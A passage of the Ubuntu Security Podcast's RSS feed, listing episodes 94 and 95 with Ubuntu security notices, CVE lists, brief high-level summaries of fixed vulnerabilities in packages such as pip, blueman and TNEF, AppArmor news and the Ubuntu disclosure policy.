<li><a href="https://ubuntu.com/security/CVE-2020-25659">CVE-2020-25659</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Bleichenbacher timing oracle attack (form of an adaptive
chosen-ciphertext attack) against RSA decryption could allow a remote
attacker to infer the private key</li>
<li><a href="https://medium.com/@c0D3M/bleichenbacher-attack-explained-bc630f88ff25">https://medium.com/@c0D3M/bleichenbacher-attack-explained-bc630f88ff25</a></li>
</ul>
<h3 id="usn-4615-1-yerase-s-tnef-vulnerabilities-07-23">[<a href="https://usn.ubuntu.com/4615-1/">USN-4615-1</a>] Yerase&rsquo;s TNEF vulnerabilities [07:23]</h3>
<ul>
<li>12 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-6802">CVE-2017-6802</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6801">CVE-2017-6801</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6800">CVE-2017-6800</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6306">CVE-2017-6306</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6305">CVE-2017-6305</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6304">CVE-2017-6304</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6303">CVE-2017-6303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6302">CVE-2017-6302</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6301">CVE-2017-6301</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6300">CVE-2017-6300</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6299">CVE-2017-6299</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6298">CVE-2017-6298</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>libtynef - TNEF stream reader library (proprietary format used by MS
Outlook / Exchange Server for email attachments)</li>
<li>Lots of issues - NULL ptr deref, infinite loop, buffer overflows, OOB
reads, directory traversal issues and more :) -&gt; crash / DoS / RCE</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="apparmor-3-dot-0-dot-1-being-prepared-08-22">AppArmor 3.0.1 being prepared [08:22]</h3>
<ul>
<li>Includes fixes for various application profiles as well as a fix to stop
aa-notify from exiting after 100s of no activity</li>
</ul>
<h3 id="securing-linux-machines-with-apparmor-webinar-08-57">Securing Linux Machines with AppArmor Webinar [08:57]</h3>
<ul>
<li><a href="https://www.brighttalk.com/webcast/6793/440491">https://www.brighttalk.com/webcast/6793/440491</a></li>
<li>Currently scheduled for Mon 16th Nov at 16:00 UTC</li>
<li>Presented by Mike Salvatore - who also wrote the <a href="https://ubuntu.com/engage/apparmor-intro">Introduction to AppArmor whitepaper</a></li>
<li>Will cover:
<ul>
<li>Why a ‘defence in depth’ strategy should be employed to mitigate the
potential damage caused by a breach</li>
<li>An explanation of AppArmor, its key features and why the principle of
least privilege is recommended</li>
<li>The use of AppArmor in Ubuntu and snaps</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E095.mp3" length="8146716" type="audio/mpeg" /><itunes:duration>10:26</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 94
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-94/</link>
          <pubDate>Fri, 30 Oct 2020 16:14:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>e122c15dd15d35025d266cc26be32e09bb0c50f9e4ddc704ebba710e4cd3ed198ef56eb0fcf6afd3c53cc4932611876b21af496680395e8ea1782c34f07b4980</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 94</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover news of the CITL drop of 7000 "vulnerabilities", the
  Ubuntu Security disclosure and embargo policy plus we look at security
  updates for pip, blueman, the Linux kernel and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover news of the CITL drop of 7000 "vulnerabilities", the
  Ubuntu Security disclosure and embargo policy plus we look at security
  updates for pip, blueman, the Linux kernel and more.
  </itunes:summary>
        <description>  This week we cover news of the CITL drop of 7000 "vulnerabilities", the
  Ubuntu Security disclosure and embargo policy plus we look at security
  updates for pip, blueman, the Linux kernel and more.
  </description>
        <googleplay:description>  This week we cover news of the CITL drop of 7000 "vulnerabilities", the
  Ubuntu Security disclosure and embargo policy plus we look at security
  updates for pip, blueman, the Linux kernel and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover news of the CITL drop of 7000 &ldquo;vulnerabilities&rdquo;, the
Ubuntu Security disclosure and embargo policy plus we look at security
updates for pip, blueman, the Linux kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>117 unique CVEs addressed</p>
<h3 id="usn-4596-1-tomcat-vulnerabilities-01-01">[<a href="https://usn.ubuntu.com/4596-1/">USN-4596-1</a>] Tomcat vulnerabilities [01:01]</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9484">CVE-2020-9484</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13935">CVE-2020-13935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13934">CVE-2020-13934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11996">CVE-2020-11996</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4587-1-italc-vulnerabilities">[<a href="https://usn.ubuntu.com/4587-1/">USN-4587-1</a>] iTALC vulnerabilities</h3>
<ul>
<li>19 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15681">CVE-2019-15681</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7225">CVE-2018-7225</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20750">CVE-2018-20750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20749">CVE-2018-20749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20748">CVE-2018-20748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20024">CVE-2018-20024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20023">CVE-2018-20023</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20022">CVE-2018-20022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20021">CVE-2018-20021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20020">CVE-2018-20020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20019">CVE-2018-20019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15127">CVE-2018-15127</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9942">CVE-2016-9942</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9941">CVE-2016-9941</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2014-6055">CVE-2014-6055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2014-6054">CVE-2014-6054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2014-6053">CVE-2014-6053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2014-6052">CVE-2014-6052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2014-6051">CVE-2014-6051</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4588-1-flightgear-vulnerability">[<a href="https://usn.ubuntu.com/4588-1/">USN-4588-1</a>] FlightGear vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-9956">CVE-2016-9956</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4552-2-pam-python-vulnerability">[<a href="https://usn.ubuntu.com/4552-2/">USN-4552-2</a>] Pam-python vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16729">CVE-2019-16729</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4597-1-mod-auth-mellon-vulnerabilities">[<a href="https://usn.ubuntu.com/4597-1/">USN-4597-1</a>] mod_auth_mellon vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3878">CVE-2019-3878</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3877">CVE-2019-3877</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6807">CVE-2017-6807</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4598-1-libetpan-vulnerability">[<a href="https://usn.ubuntu.com/4598-1/">USN-4598-1</a>] LibEtPan vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15953">CVE-2020-15953</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4600-1-usn-4600-2-netty-vulnerabilities">[<a href="https://usn.ubuntu.com/4600-1/">USN-4600-1</a>, <a href="https://usn.ubuntu.com/4600-2/">USN-4600-2</a>] Netty vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), 4 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11612">CVE-2020-11612</a> <!-- raw HTML omitted -->  (bionic only)</li>
<li><a href="https://ubuntu.com/security/CVE-2020-7238">CVE-2020-7238</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16869">CVE-2019-16869</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20445">CVE-2019-20445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20444">CVE-2019-20444</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4601-1-pip-vulnerability-01-34">[<a href="https://usn.ubuntu.com/4601-1/">USN-4601-1</a>] pip vulnerability [01:34]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20916">CVE-2019-20916</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to sanitize filenames during pip install if provided a URL in the
install command - could allow a remote attacker to provide a
Content-Disposition header that instructs pip to overwrite arbitrary
files</li>
</ul>
<h3 id="usn-4599-1-usn-4599-2-firefox-vulnerabilities-02-42">[<a href="https://usn.ubuntu.com/4599-1/">USN-4599-1</a>, <a href="https://usn.ubuntu.com/4599-2/">USN-4599-2</a>] Firefox vulnerabilities [02:42]</h3>
<ul>
<li>7 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15969">CVE-2020-15969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15684">CVE-2020-15684</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15683">CVE-2020-15683</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15682">CVE-2020-15682</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15681">CVE-2020-15681</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15680">CVE-2020-15680</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15254">CVE-2020-15254</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="lsn-0073-1-linux-kernel-vulnerability-03-02">[<a href="https://usn.ubuntu.com/lsn/0073-1/">LSN-0073-1</a>] Linux kernel vulnerability [03:02]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-24490">CVE-2020-24490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12352">CVE-2020-12352</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12351">CVE-2020-12351</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>BleedingTooth (<a href="https://ubuntusecuritypodcast.org/episode-93/">Episode 93</a>)</li>
</ul>
<h3 id="usn-4593-2-freetype-vulnerability-03-23">[<a href="https://usn.ubuntu.com/4593-2/">USN-4593-2</a>] FreeType vulnerability [03:23]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15999">CVE-2020-15999</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-93/">Episode 93</a></li>
</ul>
<h3 id="usn-4602-1-usn-4602-2-perl-vulnerabilities-03-38">[<a href="https://usn.ubuntu.com/4602-1/">USN-4602-1</a>, USN-4602-2] Perl vulnerabilities [03:38]</h3>
<ul>
<li>3 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12723">CVE-2020-12723</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10878">CVE-2020-10878</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10543">CVE-2020-10543</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4562-2-kramdown-vulnerability">[<a href="https://usn.ubuntu.com/4562-2/">USN-4562-2</a>] kramdown vulnerability</h3>
<ul>
<li>1 CVEs addressed in Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14001">CVE-2020-14001</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4605-1-blueman-vulnerability-04-10">[<a href="https://usn.ubuntu.com/4605-1/">USN-4605-1</a>] Blueman vulnerability [04:10]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15238">CVE-2020-15238</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Reported to Ubuntu by Vaisha Bernard - worked with upstream blueman devs
&amp; Debian maintainers to get this resolved - thanks :)</li>
<li>Blueman provides a dbus API to spawn DHCP client when doing
bluetooth-based networking</li>
<li>Would not sanitise the provided argument and would pass this directly to
dhcpcd which supports specifying a script file to run - this gets
executed as root so is a simple local root-privesc</li>
<li>Fixed to change the way the argument is provided to dhcpcd so that it
cannot pass arbitrary flags</li>
<li>Should also note, by default on Ubuntu we use isc-dhcp-client not dhcpcd
so unless you have manually installed it, this cannot be exploited</li>
</ul>
<h3 id="usn-4583-2-php-vulnerabilities">[<a href="https://usn.ubuntu.com/4583-2/">USN-4583-2</a>] PHP vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7070">CVE-2020-7070</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7069">CVE-2020-7069</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-3081-2-tomcat-vulnerability">[<a href="https://usn.ubuntu.com/3081-2/">USN-3081-2</a>] Tomcat vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-1240">CVE-2016-1240</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4603-1-mariadb-vulnerabilities">[<a href="https://usn.ubuntu.com/4603-1/">USN-4603-1</a>] MariaDB vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-2814">CVE-2020-2814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2812">CVE-2020-2812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2760">CVE-2020-2760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-2752">CVE-2020-2752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15180">CVE-2020-15180</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13249">CVE-2020-13249</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4604-1-mysql-vulnerabilities">[<a href="https://usn.ubuntu.com/4604-1/">USN-4604-1</a>] MySQL vulnerabilities</h3>
<ul>
<li>49 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14893">CVE-2020-14893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14891">CVE-2020-14891</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14888">CVE-2020-14888</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14878">CVE-2020-14878</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14873">CVE-2020-14873</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14870">CVE-2020-14870</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14869">CVE-2020-14869</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14868">CVE-2020-14868</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14867">CVE-2020-14867</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14866">CVE-2020-14866</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14861">CVE-2020-14861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14860">CVE-2020-14860</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14853">CVE-2020-14853</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14852">CVE-2020-14852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14848">CVE-2020-14848</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14846">CVE-2020-14846</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14845">CVE-2020-14845</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14844">CVE-2020-14844</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14839">CVE-2020-14839</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14838">CVE-2020-14838</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14837">CVE-2020-14837</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14836">CVE-2020-14836</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14830">CVE-2020-14830</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14829">CVE-2020-14829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14828">CVE-2020-14828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14827">CVE-2020-14827</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14821">CVE-2020-14821</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14814">CVE-2020-14814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14812">CVE-2020-14812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14809">CVE-2020-14809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14804">CVE-2020-14804</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14800">CVE-2020-14800</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14794">CVE-2020-14794</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14793">CVE-2020-14793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14791">CVE-2020-14791</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14790">CVE-2020-14790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14789">CVE-2020-14789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14786">CVE-2020-14786</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14785">CVE-2020-14785</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14777">CVE-2020-14777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14776">CVE-2020-14776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14775">CVE-2020-14775</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14773">CVE-2020-14773</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14771">CVE-2020-14771</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14769">CVE-2020-14769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14765">CVE-2020-14765</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14760">CVE-2020-14760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14672">CVE-2020-14672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14775">CVE-2019-14775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4607-1-openjdk-vulnerabilities">[<a href="https://usn.ubuntu.com/4607-1/">USN-4607-1</a>] OpenJDK vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14803">CVE-2020-14803</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14798">CVE-2020-14798</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14797">CVE-2020-14797</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14796">CVE-2020-14796</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14792">CVE-2020-14792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14782">CVE-2020-14782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14781">CVE-2020-14781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14779">CVE-2020-14779</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4608-1-ca-certificates-update-06-41">[<a href="https://usn.ubuntu.com/4608-1/">USN-4608-1</a>] ca-certificates update [06:41]</h3>
<ul>
<li>Affecting Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)</li>
<li>Updates to the latest from Mozill a - removes some root CAs (expired etc)
and adds some new ones too</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-security-disclosure-and-embargo-policy-07-17">Ubuntu Security disclosure and embargo policy [07:17]</h3>
<ul>
<li><a href="https://ubuntu.com/security/disclosure-policy">https://ubuntu.com/security/disclosure-policy</a></li>
<li>How to report an issue to us (LP / <a href="mailto:security@ubuntu.com">security@ubuntu.com</a>)</li>
<li>Scope (Ubuntu archive + Canonical software / infrastructure -
coordination etc)</li>
<li>What to expect from us</li>
<li>Disclosure timelines (within 1 week after updates provided, prefer
exploits etc kept private for at least 1 week after fixes available)</li>
<li>Safe harbour (welcome research into the software we provide but no active
probing of Canonical infra/services)</li>
</ul>
<h3 id="citl-releases-high-level-details-of-7000-defects-09-06">CITL releases high level details of 7000 defects [09:06]</h3>
<ul>
<li><a href="https://cyber-itl.org/2020/10/28/citl-7000-defects.html">https://cyber-itl.org/2020/10/28/citl-7000-defects.html</a></li>
<li>7000 defects/vulns across 3243 packages from Ubuntu 18.04</li>
<li>Automated static / dynamic analysis system (fuzzing?)</li>
<li>Provide list of binaries / packages and the type of &lsquo;vuln&rsquo; (SIG_SEGV
etc) - without reproducers etc</li>
<li>Expect package maintainers to contact them to request full details</li>
<li>Some package maintainers / upstreams will likely contact but we expect
this to be in the minority</li>
<li>Not really possible for @ubuntu_sec to triage and handle all of these but
will likely be a collective effort between distros to try and analyse
these all if CITL are willing to provide details</li>
<li>Without a collective effort unlikely that CVEs will get assigned and so
fixes could be missed if various upstreams just contact and fix these
themselves</li>
<li>Lots of open questions as to how this will play out&hellip;</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E094.mp3" length="10546651" type="audio/mpeg" /><itunes:duration>13:35</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 93
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-93/</link>
          <pubDate>Fri, 23 Oct 2020 15:08:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>1ac321387c0aef00b14f8c8fd60b70318d77b029370cb95e2e236d7031d15008db7bb473b8fe8cfe573bc72c4718ef62ce565556e3b53d0a840dcd8d84b7e293</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 93</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover security updates for NTP, Brotli, Spice, the Linux
  kernel (including BleedingTooth) and a FreeType vulnerability which is
  being exploited in-the-wild, plus we talk about the NSAs report into the
  most exploited...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover security updates for NTP, Brotli, Spice, the Linux
  kernel (including BleedingTooth) and a FreeType vulnerability which is
  being exploited in-the-wild, plus we talk about the NSAs report into the
  most exploited vulnerabilities as well as the release of Ubuntu 20.10
  Groovy Gorilla.
  </itunes:summary>
        <description>  This week we cover security updates for NTP, Brotli, Spice, the Linux
  kernel (including BleedingTooth) and a FreeType vulnerability which is
